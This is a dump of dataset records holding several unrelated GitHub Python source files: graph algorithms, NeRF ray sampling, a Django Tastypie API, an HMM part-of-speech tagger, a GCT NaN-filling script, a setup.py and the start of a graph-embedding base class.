\"%\")\n\n\ndriver.quit()\n","repo_name":"njrafi/Code-Downloaders","sub_path":"codeChef.py","file_name":"codeChef.py","file_ext":"py","file_size_in_byte":4072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"24333871216","text":"def dijkstra(graph, source):\n dist = [float('inf')] * len(graph)\n dist[source] = 0\n \n # Create a set to track the nodes that have been processed.\n visited = set()\n \n # Set the current node to the source node.\n current_node = source\n \n # Loop until all nodes have been processed.\n while len(visited) != len(graph):\n # For each neighbor of the current node, calculate the distance to the neighbor\n # using the weight of the edge connecting the current node and the neighbor.\n # If the calculated distance is less than the current value in the distance array\n # for that neighbor, update the distance array with the new shorter distance.\n for neighbor, weight in graph[current_node].items():\n if neighbor not in visited:\n dist[neighbor] = min(dist[neighbor], dist[current_node] + weight)\n \n # Add the current node to the visited set and mark it as processed.\n visited.add(current_node)\n \n # Set the current node to the unvisited node with the smallest distance.\n current_node = min(set(range(len(graph))) - visited, key=lambda x: dist[x])\n \n # Return the distance array.\n return dist","repo_name":"SineshX/leetcode","sub_path":"python/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20263597418","text":"from typing import Tuple\n\nimport torch\n\n\ndef create_rays(num_images: int, Ts_c2w: torch.Tensor, height: int, width: int, fx: float, fy: float, cx: float,\n cy: float, near: float, far: float, use_view_dirs: bool = True):\n \"\"\"\n Convention details: \"opencv\" or \"opengl\".\n It defines the coordinates convention of rays from cameras.\n OpenCV defines x,y,z as right, down, forward while OpenGL defines x,y,z as right, up, backward\n (camera looking towards forward direction still, -z!).\n\n Note: Use either convention is fine, but the corresponding pose should follow the same convention.\n \"\"\"\n\n rays_cam = _get_rays_camera(num_images, height, width, fx, fy, cx, cy) # [N, H, W, 3]\n\n dirs_C = rays_cam.view(num_images, -1, 3) # [N, HW, 3]\n rays_o, rays_d = _get_rays_world(Ts_c2w, dirs_C) # origins: [B, HW, 3], dirs_W: [B, HW, 3]\n\n if use_view_dirs:\n # Providing ray directions as input\n view_dirs = rays_d / torch.norm(rays_d, dim=-1, keepdim=True).float()\n\n near, far = near * torch.ones_like(rays_d[..., :1]), far * torch.ones_like(rays_d[..., :1])\n rays = torch.cat([rays_o, rays_d, near, far], -1)\n\n if use_view_dirs:\n rays = torch.cat([rays, view_dirs], -1)\n\n return rays\n\n\ndef _get_rays_camera(B: int, H: int, W: int, fx: float, fy: float, cx: float, cy: float) -> torch.Tensor:\n \"\"\"\n Getting rays from camera perspective\n \"\"\"\n\n # Pytorch's meshgrid has indexing \"ij\", by transposing it we get \"xy\"\n i, j = torch.meshgrid(torch.arange(W), torch.arange(H))\n i = i.t().float()\n j = j.t().float()\n\n size = [B, H, W]\n\n i_batch = torch.empty(size)\n j_batch = torch.empty(size)\n i_batch[:, :, :] = i[None, :, :]\n j_batch[:, :, :] = j[None, :, :]\n\n x = (i_batch - cx) / fx\n y = (j_batch - cy) / fy\n z = torch.ones(size)\n\n dirs = torch.stack((x, y, z), dim=3) # shape of [B, H, W, 3], 3 comes from x, y, z not channels,\n # channels contain redundant info for spa\n return dirs\n\n\ndef _get_rays_world(T_WC: torch.Tensor, dirs_C: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Getting rays in world coordinates\n \"\"\"\n\n R_WC = T_WC[:, :3, :3] # Bx3x3\n dirs_W = torch.matmul(R_WC[:, None, ...], dirs_C[..., None]).squeeze(-1)\n origins = T_WC[:, :3, -1] # Bx3\n origins = torch.broadcast_tensors(origins[:, None, :], dirs_W)[0]\n\n return origins, dirs_W\n\n\ndef sample_pdf(bins, weights, N_samples, det=False):\n \"\"\"\n Hierarchical sampling using inverse CDF transformations.\n Sample @N_importance samples from @bins with distribution defined by @weights.\n\n Inputs:\n bins: N_rays x (N_samples_coarse - 1)\n weights: N_rays x (N_samples_coarse - 2)\n N_samples: N_samples_fine\n det: deterministic or not\n \"\"\"\n\n # Get pdf\n weights = weights + 1e-5 # prevent nans, prevent division by zero (don't do inplace op!)\n pdf = weights / torch.sum(weights, -1, keepdim=True)\n cdf = torch.cumsum(pdf, -1) # N_rays x (N_samples - 2)\n cdf = torch.cat([torch.zeros_like(cdf[..., :1]), cdf], -1) # N_rays x (N_samples_coarse - 1)\n # padded to 0~1 inclusive, (N_rays, N_samples-1)\n\n # Take uniform samples\n if det: # generate deterministic samples\n u = torch.linspace(0., 1., steps=N_samples, device=bins.device)\n u = u.expand(list(cdf.shape[:-1]) + [N_samples])\n else:\n u = torch.rand(list(cdf.shape[:-1]) + [N_samples], device=bins.device)\n # (N_rays, N_samples_fine)\n\n # Invert CDF\n u = u.contiguous()\n inds = torch.searchsorted(cdf.detach(), u, right=True) # N_rays x N_samples_fine\n below = torch.max(torch.zeros_like(inds - 1), inds - 1)\n above = torch.min((cdf.shape[-1] - 1) * torch.ones_like(inds), inds)\n inds_g = torch.stack([below, above], -1) # (N_rays, N_samples_fine, 2)\n\n matched_shape = [inds_g.shape[0], inds_g.shape[1], cdf.shape[-1]] # (N_rays, N_samples_fine, N_samples_coarse - 1)\n\n cdf_g = torch.gather(cdf.unsqueeze(1).expand(matched_shape), 2, inds_g) # N_rays, N_samples_fine, 2\n bins_g = torch.gather(bins.unsqueeze(1).expand(matched_shape), 2, inds_g) # N_rays, N_samples_fine, 2\n\n denom = (cdf_g[..., 1] - cdf_g[..., 0]) # # N_rays, N_samples_fine\n denom = torch.where(denom < 1e-5, torch.ones_like(denom), denom)\n # denom equals 0 means a bin has weight 0, in which case it will not be sampled\n # anyway, therefore any value for it is fine (set to 1 here)\n\n t = (u - cdf_g[..., 0]) / denom\n samples = bins_g[..., 0] + t * (bins_g[..., 1] - bins_g[..., 0])\n\n return samples\n","repo_name":"dmjovan/NeRF-Workspaces-Explorer","sub_path":"nerf/rays/rays.py","file_name":"rays.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73714509385","text":"from tastypie.resources import ModelResource, ALL\nfrom tastypie.authorization import Authorization\nfrom tastypie import fields\nfrom API.models import Investment, Updates\n\n\nclass InvestmentResource(ModelResource):\n\n class Meta:\n queryset = Investment.objects.all()\n list_allowed_methods = ['get', 'post']\n detail_allowed_methods = ['get', 'post']\n filtering = {\n 'date': ALL,\n }\n resource_name = 'investment'\n authorization = Authorization()\n fields = ['company', 'quantity', 'cost', 'date']\n excludes = ['id']\n\n\nclass UpdatesResource(ModelResource):\n\n investment = fields.ForeignKey(InvestmentResource, 'investment')\n\n class Meta:\n queryset = Updates.objects.all()\n list_allowed_methods = ['get', 'post']\n detail_allowed_methods = ['get', 'post']\n filtering = {\n 'date': ALL,\n 'date_entered': ('lte',),\n 'investment_id': ALL\n }\n resource_name = 'updates'\n authorization = Authorization()\n fields = ['quantity', 'cost', 'investment', 'date']\n excludes = ['id']\n\n#Finally got POST call to work to create updates\n# {\n# \"quantity\" : 5,\n# \"cost\" : 10,\n# \"investment\" : \"/api/investment/3/\"\n# }\n","repo_name":"elizabethlarkinnelson/Portfolio_API","sub_path":"portfolio_api_project/API/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39265630988","text":"import numpy,re,random\nimport math\nimport itertools\nimport operator\n\n\nclass smartsolver:\n\n\tdef __init__(self):\n\t\tself.word_dict = {}\n\t\tself.word_dict_reverse = {}\n\t\tself.pos_dict = {}\n\t\tself.pos_dict_reverse = {}\n\t\tself.word_count = 0\n\t\tself.pos_count = 0\n\t\tself.ProbTables = {}\n\t\tself.defaultWordProbability = 0.00\n\t\tself.cache = {}\n\n\tdef getFromDict(self,dataDict, mapList):\n\t\ttry:\n\t\t\tvalue = reduce(lambda d, k: d[k], mapList, dataDict)\n\t\t\treturn value\n\t\texcept:\n\t\t\treturn None\n\n\tdef most_common(self,L):\n\t\td = {}\n\t\tfor i in L:\n\t\t\tif i not in d:\n\t\t\t\td[i] = 0\n\t\t\telse:\n\t\t\t\td[i] += 1\n\t\tmax = \"1\"\n\t\tmaxc = 0\n\t\tfor i in d:\n\t\t\tif maxc < d[i]:\n\t\t\t\tmax = i\n\t\t\t\tmaxc = d[i]\n\t\treturn max\n\n\tdef setInDict(self,given_dataDict, given_maplist, value):\n\t\tif len(given_maplist) == 1:\n\t\t\tgiven_dataDict[given_maplist[0]] = value\n\t\telse:\n\t\t\tif given_maplist[0] in given_dataDict:\n\t\t\t\tnewmaplist = given_maplist[1:][:]\n\t\t\t\tself.setInDict(given_dataDict[given_maplist[0]], newmaplist,value)\n\t\t\telse:\n\t\t\t\ti=len(given_maplist)-1\n\t\t\t\twhile i > 0:\n\t\t\t\t\tnew_dict = {given_maplist[i]:value}\n\t\t\t\t\tvalue = new_dict\n\t\t\t\t\ti -= 1\n\t\t\t\tgiven_dataDict[given_maplist[0]]=value\n\n\tdef is_number(self,s):\n\t\ttry:\n\t\t\tfloat(s)\n\t\t\treturn True\n\t\texcept ValueError:\n\t\t\treturn False\n\n\tdef smarttrain(self,data):\n\n\t\tfor (s, gt) in data:\n\t\t\tfor word in s:\n\t\t\t\tif word not in self.word_dict:\n\t\t\t\t\tif self.is_number(word):\n\t\t\t\t\t\tself.word_dict[\"1\"] = self.word_count\n\t\t\t\t\t\tself.word_dict_reverse[self.word_count] = \"1\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.word_dict[word] = self.word_count\n\t\t\t\t\t\tself.word_dict_reverse[self.word_count] = word\n\t\t\t\t\tself.word_count += 1\n\t\t\tfor tag in gt:\n\t\t\t\tif tag not in self.pos_dict:\n\t\t\t\t\tself.pos_dict[tag] = self.pos_count\n\t\t\t\t\tself.pos_dict_reverse[self.pos_count] = tag\n\t\t\t\t\tself.pos_count += 1\n\n\t\ttable1 = numpy.zeros(shape=(self.word_count, self.pos_count)).astype(int)\n\n\t\tfor (s ,gt) in data:\n\t\t\tfor i in range(0, len(s)):\n\t\t\t\ttable1[self.word_dict[s[i]]][self.pos_dict[gt[i]]] += 1\n\t\ttable8 = table1.sum(axis=1)\n\t\ttable9 = numpy.zeros(shape=self.word_count).astype(float)\n\t\twordcount = table1.sum()\n\t\tfor i in range(0, self.word_count):\n\t\t\ttable9[i] = float(table8[i])/float(wordcount)\n\t\tself.defaultWordProbability = table9.min()\n\n\n\t\ttable3 = table1.sum(axis=0)\n\t\ttotal = 0\n\t\tfor (s, gt) in data:\n\t\t\ttotal += len(s)\n\t\ttable2 = numpy.zeros(shape=(1, self.pos_count)).astype(float)\n\t\tfor i in range(0,self.pos_count):\n\t\t\ttable2[0][i] = float(table3[i])/float(total)\n\n\t\ttable4 = numpy.zeros(shape=(self.pos_count, self.pos_count)).astype(float)\n\t\tfor (s, gt) in data:\n\t\t\tfor i in range(1, len(gt)):\n\t\t\t\ttable4[self.pos_dict[gt[i-1]]][self.pos_dict[gt[i]]] += 1\n\t\ttable5 = table4.sum(axis=1)\n\n\n\t\tfor i in range(0, self.pos_count):\n\t\t\tfor j in range(0, self.pos_count):\n\t\t\t\ttable4[i][j]=float(table4[i][j])/float(table5[i])\n\t\ttable6 = numpy.zeros(shape=(self.pos_count, self.pos_count)).astype(float)\n\t\tnumpy.copyto(table6, table4)\n\t\ttable7 = table6.sum(axis = 0)\n\t\tfor i in range(0, self.pos_count):\n\t\t\tfor j in range(0, self.pos_count):\n\t\t\t\ttable6[j][i] = float(table6[j][i])/float(table7[i])\n\n\t\tself.ProbTables[\"CountWordTag\"] = table1\n\t\tself.ProbTables[\"ProbTag\"] = table2\n\t\tself.ProbTables[\"CountTag\"] = table3\n\t\tself.ProbTables[\"ProbTagSet\"] = table4\n\t\tself.ProbTables[\"ProbTagSetTranspose\"] = table6\n\t\tself.ProbTables[\"PorbWord\"] = table9\n\n\t\treturn self.ProbTables\n\n\tdef naiveAlgo(self, sentence):\n\t\tnaiveTag = []\n\t\twordTag = {}\n\t\tresult = []\n\t\tfor i in range(0, len(sentence)):\n\t\t\tprobability = -1\n\t\t\ttag = None\n\t\t\tmaxTagValue = \"\"\n\t\t\tif sentence[i] not in self.word_dict:\n\t\t\t\tproceed = 1\n\t\t\t\tif(bool(re.search(r'\\d', sentence[i]))) == True:\n\t\t\t\t\tproceed = 0\n\t\t\t\t\tresult.append('1')\n\n\t\t\t\tif len(result) > 0 and proceed == 1:\n\t\t\t\t\tmaxTag = 0\n\t\t\t\t\tfor j in range(0,self.pos_count):\n\t\t\t\t\t\tprevTag = self.ProbTables[\"ProbTagSet\"][self.pos_dict[result[i-1]]][j]\n\t\t\t\t\t\tif prevTag > maxTag:\n\t\t\t\t\t\t\tmaxTag = prevTag\n\t\t\t\t\t\t\tmaxTagValue = self.pos_dict_reverse[j]\n\n\t\t\t\t\tresult.append(maxTagValue)\n\t\t\t\telif proceed == 1:\n\t\t\t\t\tmaxProb = self.ProbTables[\"ProbTag\"].argmax()\n\t\t\t\t\tmaxTag = self.pos_dict_reverse[maxProb]\n\t\t\t\t\tresult.append(maxTag)\n\n\t\t\telse:\n\t\t\t\tfor j in range(0,self.pos_count):\n\t\t\t\t\tif i==0:\n\t\t\t\t\t\tprob = float(self.ProbTables[\"CountWordTag\"][self.word_dict[sentence[i]]][j])/float(self.ProbTables[\"CountTag\"][j]) * self.wsi(j)\n\t\t\t\t\telse:\n\t\t\t\t\t\tprob = float(self.ProbTables[\"CountWordTag\"][self.word_dict[sentence[i]]][j])/float(self.ProbTables[\"CountTag\"][j]) * self.wsi(j)*self.ProbTables[\"ProbTagSet\"][self.pos_dict[result[-1]]][j]\n\t\t\t\t\tif prob > probability:\n\t\t\t\t\t\tprobability = prob\n\t\t\t\t\t\ttag = self.pos_dict_reverse[j]\n\t\t\t\tresult.append(tag)\n\t\t\t\twordTag[sentence[i]] = tag\n\n\t\treturn [[[self.most_common(result)]*len(result)],[]]\n\t\t#return [[[\"1\"]*len(sentence)],[]]\n\n\tdef wsi(self, i):\n\t\treturn self.ProbTables[\"ProbTag\"][0][i]\n\n\tdef esiwi(self, tag_index, word):\n\t\tif word in self.word_dict:\n\t\t\tword_tag_count = self.ProbTables[\"CountWordTag\"][self.word_dict[word]][tag_index]\n\t\t\ttag_count = self.ProbTables[\"CountTag\"][tag_index]\n\t\t\treturn float(word_tag_count)/float(tag_count)\n\t\telse:\n\t\t\treturn 1.0/12.0\n\n\tdef psiminus1si(self, tag_index1, tag_index2):\n\t\treturn self.ProbTables[\"ProbTagSetTranspose\"][tag_index1][tag_index2]\n\tdef psiplus1si(self, tag_index1, tag_index2):\n\t\treturn self.ProbTables[\"ProbTagSet\"][tag_index1][tag_index2]\n\n\tdef smartviterbi(self,sentence):\n\t\tsmarttree = numpy.zeros(shape=(self.pos_count,len(sentence),2))\n\n\t\tfor i in range(0, self.pos_count):\n\t\t\tsmarttree[i][0][1] = -1\n\n\t\tmax = 0\n\t\tfor i in range(0, self.pos_count):\n\t\t\tvalue = self.wsi(i)*self.esiwi(i,sentence[0])\n\t\t\tif value > max:\n\t\t\t\tmax = value\n\t\t\tsmarttree[i][0][0] = value\n\n\t\tfor i in range(0, self.pos_count):\n\t\t\tsmarttree[i][0][0] = smarttree[i][0][0]/max\n\n\n\t\tfor t in range(1,len(sentence)):\n\t\t\tmax_column = 0\n\t\t\tfor s in range(0, self.pos_count):\n\t\t\t\tmax_value = 0\n\t\t\t\tesiwi = self.esiwi(s,sentence[t])\n\t\t\t\tif esiwi != 0:\n\t\t\t\t\tfor olds in range(0, self.pos_count):\n\t\t\t\t\t\tval = smarttree[olds][t-1][0]*self.ProbTables[\"ProbTagSet\"][olds][s]\n\t\t\t\t\t\tif val > max_value:\n\t\t\t\t\t\t\tmax_value = val\n\t\t\t\t\t\t\tsmarttree[s][t][0] = val\n\t\t\t\t\t\t\tsmarttree[s][t][1] = olds\n\t\t\t\tsmarttree[s][t][0] *= esiwi\n\t\t\t\tif smarttree[s][t][0] > max_column:\n\t\t\t\t\tmax_column = smarttree[s][t][0]\n\t\t\tfor s in range(0, self.pos_count):\n\t\t\t\tsmarttree[s][t][0] = smarttree[s][t][0]/max_column\n\n\t\tmax_value = 0\n\t\tmax_index = 0\n\t\tfor s in range(0, self.pos_count):\n\t\t\tif smarttree[s][len(sentence)-1][0] > max_value:\n\t\t\t\tmax_value = smarttree[s][len(sentence)-1][0]\n\t\t\t\tmax_index = s\n\n\t\tresult = [\"1\"] * len(sentence)\n\t\tresult[len(sentence)-1] = self.pos_dict_reverse[max_index]\n\n\t\tt = len(sentence)-1\n\t\twhile t >= 1:\n\t\t\tmax_index = smarttree[max_index][t][1]\n\t\t\tresult[t-1] = self.pos_dict_reverse[max_index]\n\t\t\tt -= 1\n\t\treturn [[[self.most_common(result)]*len(result)], []]\n\n\tdef gettag(self, WordTag):\n\t\tfor j in range(1, self.pos_count):\n\t\t\t\tWordTag[j] = WordTag[j-1] + WordTag[j]\n\n\t\tsum = WordTag[-1]\n\t\tif sum == 0:\n\t\t\tfor j in range(0, self.pos_count):\n\t\t\t\tWordTag[j] = 1.0/12.0\n\t\telse:\n\t\t\tfor j in range(0, self.pos_count):\n\t\t\t\tWordTag[j] = WordTag[j]/sum\n\n\t\trandomIndex = random.random()\n\t\toutputIndex = 0\n\t\tfor k in range(self.pos_count):\n\t\t\tif randomIndex <= WordTag[k]:\n\t\t\t\toutputIndex = k\n\t\t\t\tbreak\n\t\treturn self.pos_dict_reverse[outputIndex]\n\n\tdef smartMcmc(self, sentence, count):\n\t\tsenlen = len(sentence)\n\t\tinitialSample = []\n\t\tfor i in range(0, senlen):\n\t\t\tinitialSample.append(self.pos_dict_reverse[random.randint(0,11)])\n\t\tWordTag = numpy.zeros(shape=self.pos_count).astype(float)\n\n\t\tSampleList = []\n\t\tSampleList.append(initialSample)\n\t\tfor samples in range(1,count):\n\n\t\t\tpresample = SampleList[-1][:]\n\t\t\tSampleList.append(presample)\n\n\t\t\tfor i in range(0,senlen):\n\t\t\t\tfor j in range(self.pos_count):\n\t\t\t\t\tp_t = self.pos_dict[SampleList[-1][i-1]] if (i != 0) else self.pos_count\n\t\t\t\t\tn_t = self.pos_dict[SampleList[-1][i+1]] if (i != senlen-1) else self.pos_count\n\t\t\t\t\tsavedwordtag = self.getFromDict(self.cache, [sentence[i],p_t,j,n_t])\n\t\t\t\t\tif savedwordtag is not None:\n\t\t\t\t\t\tfor g in range(0, self.pos_count):\n\t\t\t\t\t\t\tWordTag[g]= savedwordtag[g]\n\t\t\t\t\telse:\n\t\t\t\t\t\tpsi = self.wsi(j)\n\t\t\t\t\t\tpwisi = self.esiwi(j,sentence[i])\n\t\t\t\t\t\tpsiminus1si = self.psiminus1si(p_t,j) if (i != 0) else 1\n\t\t\t\t\t\tpsiplus1si = self.psiplus1si(j,n_t) if (i != senlen-1) else 1\n\t\t\t\t\t\tWordTag[j] = psi * pwisi * psiminus1si * psiplus1si\n\t\t\t\t\t\tstoring = numpy.zeros(shape=self.pos_count).astype(float)\n\t\t\t\t\t\tfor g in range(0, self.pos_count):\n\t\t\t\t\t\t\tstoring[g]=WordTag[g]\n\t\t\t\t\t\tself.setInDict(self.cache,[sentence[i],p_t,j,n_t],storing)\n\t\t\t\tSampleList[samples][i] = self.gettag(WordTag)\n\n\t\treturn SampleList\n\n\n\n\tdef smartMcmcold(self, sentence, count):\n\t\tcount = count + 5\n\t\tinitialSample = []\n\t\tfor i in range(0, len(sentence)):\n\t\t\tinitialSample.append(self.pos_dict_reverse[random.randint(0,11)])\n\t\tWordTag = numpy.zeros(shape=((len(sentence)), self.pos_count)).astype(float)\n\n\t\tSampleList = []\n\t\tSampleList.append(initialSample)\n\t\tfor samples in range(1,count):\n\t\t\tpresample = SampleList[-1][:]\n\t\t\tSampleList.append(presample)\n\t\t\tfor j in range(self.pos_count):\n\t\t\t\tWordTag[0][j] = self.esiwi(j,sentence[0])*self.wsi(j)\n\t\t\t\tif len(sentence) > 1:\n\t\t\t\t\tWordTag[0][j] *= float(self.ProbTables[\"ProbTagSetTranspose\"][j][self.pos_dict[SampleList[-1][1]]])\n\n\t\t\tfor j in range(1, self.pos_count):\n\t\t\t\tWordTag[0][j] = WordTag[0][j-1] + WordTag[0][j]\n\t\t\tfor j in range(0, self.pos_count):\n\t\t\t\tif WordTag.sum() == 0:\n\t\t\t\t\tWordTag[0][j] = 1.0/12.0\n\t\t\t\telse:\n\t\t\t\t\tWordTag[0][j] = WordTag[0][j]/WordTag[0][self.pos_count -1]\n\n\t\t\trandomIndex = random.random()\n\t\t\toutputIndex = 0\n\t\t\tfor k in range(self.pos_count):\n\t\t\t\tif randomIndex <= WordTag[0][k]:\n\t\t\t\t\toutputIndex = k\n\t\t\t\t\tbreak\n\t\t\tSampleList[samples][0] = self.pos_dict_reverse[outputIndex]\n\n\t\t\ta = range(1,len(sentence))\n\t\t\trandom.shuffle(a)\n\t\t\tfor i in a:\n\t\t\t\tfor j in range(self.pos_count):\n\t\t\t\t\tWordTag[i][j] = self.esiwi(j,sentence[i]) * self.esiwi(j,sentence[i]) * self.wsi(j)\n\t\t\t\t\tif i != len(sentence)-1:\n\t\t\t\t\t\tWordTag[i][j] *= float(self.ProbTables[\"ProbTagSetTranspose\"][j][self.pos_dict[SampleList[-1][i+1]]])\n\n\t\t\t\tfor y in range(self.pos_count):\n\t\t\t\t\tif WordTag.sum() == 0:\n\t\t\t\t\t\tWordTag[i][y] = 1.0/12.0\n\t\t\t\t\telse:\n\t\t\t\t\t\tWordTag[i][y] = float(float(WordTag[i][y]) / float(WordTag.sum()))\n\n\t\t\t\tfor j in range(1, self.pos_count):\n\t\t\t\t\tWordTag[i][j] = WordTag[i][j-1] + WordTag[i][j]\n\n\t\t\t\trandomIndex = random.random()\n\n\t\t\t\toutputIndex = 0\n\t\t\t\tfor k in range(self.pos_count):\n\t\t\t\t\tif randomIndex <= WordTag[i][k]:\n\t\t\t\t\t\toutputIndex = k\n\t\t\t\t\t\tbreak\n\n\t\t\t\tSampleList[samples][i] = self.pos_dict_reverse[outputIndex]\n\n\t\treturn SampleList\n\n\tdef smartmaxmarginal(self, sentence):\n\t\tsamplecount = 100\n\t\tusing = 50\n\t\tsamples = self.smartMcmc(sentence, samplecount)[-using:]\n\t\tcountmatrix = numpy.zeros(shape=(len(sentence), self.pos_count), dtype = int)\n\t\tfor i in range(0,using):\n\t\t\tfor j in range(0, len(sentence)):\n\t\t\t\tcountmatrix[j][self.pos_dict[samples[i][j]]] += 1\n\t\ttagsum = countmatrix.sum(axis=1)\n\t\ttagmax = countmatrix.max(axis=1)\n\t\tsolution = countmatrix.argmax(axis=1)\n\t\tvalues =[]\n\t\tsolutiontags = []\n\t\tfor c in range(0, len(sentence)):\n\t\t\tvalues.append(float(tagmax[c])/float(tagsum[c]))\n\t\t\tsolutiontags.append(self.pos_dict_reverse[solution[c]])\n\t\treturn [ [ solutiontags], [values] ]\n\n\tdef smartposterior(self, sentence, label):\n\t\tresult = 0\n\t\tfor i in range(0, len(sentence)):\n\t\t\tvalue = self.esiwi(self.pos_dict[label[i]],sentence[i])\n\t\t\tif value != 0:\n\t\t\t\tresult += math.log(value)\n\t\tvalue = self.wsi(self.pos_dict[label[0]])\n\t\tif value != 0:\n\t\t\tresult += math.log(value)\n\t\tfor i in range(1, len(sentence)):\n\t\t\tvalue = self.ProbTables[\"ProbTagSet\"][self.pos_dict[label[i-1]]][self.pos_dict[label[i]]]\n\t\t\tif value != 0:\n\t\t\t\tresult += math.log(value)\n\t\t\"\"\"\n\t\tfor i in range(0, len(sentence)):\n\t\t\tif sentence[i] in self.word_dict:\n\t\t\t\tvalue = self.ProbTables[\"PorbWord\"][self.word_dict[sentence[i]]]\n\t\t\telse:\n\t\t\t\tvalue = self.defaultWordProbability\n\t\t\tif value != 0:\n\t\t\t\tresult -= math.log(value)\n\t\t\"\"\"\n\t\treturn result#self.defaultWordProbability","repo_name":"ssable94/Social-Media-Mining","sub_path":"Classifier/test/smartcode.py","file_name":"smartcode.py","file_ext":"py","file_size_in_byte":12056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71619545864","text":"\"\"\"\nReplace NaNs in the data df of a GCT with either...\n\n0) zero,\n1) the probe median, or\n2) the probe mean.\n\"\"\"\n\nimport logging\nimport argparse\nimport os\nimport sys\n\nimport broadinstitute_psp.utils.setup_logger as setup_logger\nimport cmapPy.pandasGEXpress.subset_gctoo as sg\nimport cmapPy.pandasGEXpress.parse as parse\nimport cmapPy.pandasGEXpress.write_gct as wg\n\nlogger = logging.getLogger(setup_logger.LOGGER_NAME)\n\n\ndef build_parser():\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"-verbose\", \"-v\", action=\"store_true\", default=False,\n help=\"Whether to print a bunch of output.\")\n parser.add_argument(\"in_gct_path\", type=str,\n help=\"path to input gct\")\n parser.add_argument(\"out_name\", type=str,\n help=\"what to name the output gct\")\n parser.add_argument(\"-replace_with\", \"-rw\", choices=[\"zero\", \"median\", \"mean\"],\n help=\"what to replace NaN with\", default=\"mean\")\n \n return parser\n\n\ndef main(args):\n\n # Import data\n assert os.path.exists(args.in_gct_path), (\n \"in_gct_path could not be found: {}\").format(args.in_gct_path)\n in_gct = parse.parse(args.in_gct_path)\n\n # First, check if any rows are all NaN; if so, remove them\n dropped_df = in_gct.data_df.dropna(how=\"all\")\n bools_of_remaining = in_gct.data_df.index.isin(dropped_df.index.values)\n in_gct = sg.subset_gctoo(in_gct, row_bool=bools_of_remaining)\n\n if args.replace_with == \"zero\":\n in_gct.data_df.fillna(0, inplace=True)\n\n elif args.replace_with == \"median\":\n probe_medians = in_gct.data_df.median(axis=1)\n\n for row_idx, row in enumerate(in_gct.data_df.values):\n this_row = in_gct.data_df.iloc[row_idx, :]\n this_row[this_row.isnull()] = probe_medians[row_idx]\n in_gct.data_df.iloc[row_idx, :] = this_row\n\n elif args.replace_with == \"mean\":\n probe_means = in_gct.data_df.mean(axis=1)\n\n for row_idx, row in enumerate(in_gct.data_df.values):\n this_row = in_gct.data_df.iloc[row_idx, :]\n this_row[this_row.isnull()] = probe_means[row_idx]\n in_gct.data_df.iloc[row_idx, :] = this_row\n\n wg.write(in_gct, args.out_name, filler_null=\"NA\")\n\nif __name__ == \"__main__\":\n args = build_parser().parse_args(sys.argv[1:])\n setup_logger.setup(verbose=args.verbose)\n\n main(args)\n","repo_name":"cmap/psp","sub_path":"broadinstitute_psp/utils/replace_nans.py","file_name":"replace_nans.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"74002782985","text":"import os\n\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(here, 'README.md')) as f:\n README = f.read()\nwith open(os.path.join(here, 'CHANGES.txt')) as f:\n CHANGES = f.read()\n\nrequires = [\n 'pyramid',\n 'pypugjs',\n 'alembic',\n 'psycopg2-binary',\n 'SQLAlchemy',\n 'pyramid_tm',\n 'transaction',\n 'pyramid_retry',\n 'zope.sqlalchemy',\n 'celery',\n 'geoip2',\n 'idna',\n 'pyyaml'\n]\n\ndev_require = [\n 'plaster_pastedeploy',\n 'waitress',\n 'pyramid_debugtoolbar',\n 'pycodestyle',\n 'sphinx',\n 'sphinc-rtd-theme',\n 'cornice_swagger',\n 'sphinxcontrib-openapi',\n 'black',\n]\n\ntests_require = [\n 'WebTest >= 1.3.1', # py3 compat\n 'pytest >= 3.7.4',\n 'pytest-cov',\n]\n\nsetup(\n name='netwark',\n version='1.0.0',\n description='netwark',\n long_description=README + '\\n\\n' + CHANGES,\n classifiers=[\n 'Programming Language :: Python',\n 'Framework :: Pyramid',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Internet :: WWW/HTTP :: WSGI :: Application',\n ],\n author='Michael Vieira',\n author_email='contact+dev[âT]mvieira[d¤T]fr',\n url='https://github.com/themimitoof/netwark',\n keywords='network tools ping mtr traceroute geoip lookup as pyramid',\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n extras_require={'testing': tests_require, 'dev': dev_require},\n install_requires=requires,\n entry_points={\n 'paste.app_factory': ['main = netwark:main'],\n 'console_scripts': [\n 'initialize_netwark_db=netwark.bin.initialize_db:main'\n ],\n },\n)\n","repo_name":"Themimitoof/netwark","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"6628019613","text":"from abc import ABCMeta, ABC, abstractmethod\nimport numpy as np\n\n\nclass StaticGraphEmbedding(ABC):\n __metaclass__ = ABCMeta\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize the Embedding class\n \"\"\"\n self._method_name = None\n self._d = None\n self._X = None\n self.hyper_params.update(kwargs)\n for key in self.hyper_params.keys():\n self.__setattr__('_%s' % key, self.hyper_params[key])\n for dictionary in args:\n for key in dictionary:\n self.__setattr__('_%s' % key, dictionary[key])\n\n def get_method_name(self):\n \"\"\" Returns the name for the embedding method\n\n Return:\n The name of embedding\n \"\"\"\n return self._method_name\n\n def get_method_summary(self):\n \"\"\" Returns the summary for the embedding include method name and paramater setting\n\n Return:\n A summary string of the method\n \"\"\"\n\n return '%s_%d' % (self._method_name, self._d)\n\n def get_embedding(self):\n \"\"\" Returns the learnt embedding\n\n Return:\n A numpy array of size #nodes * d\n 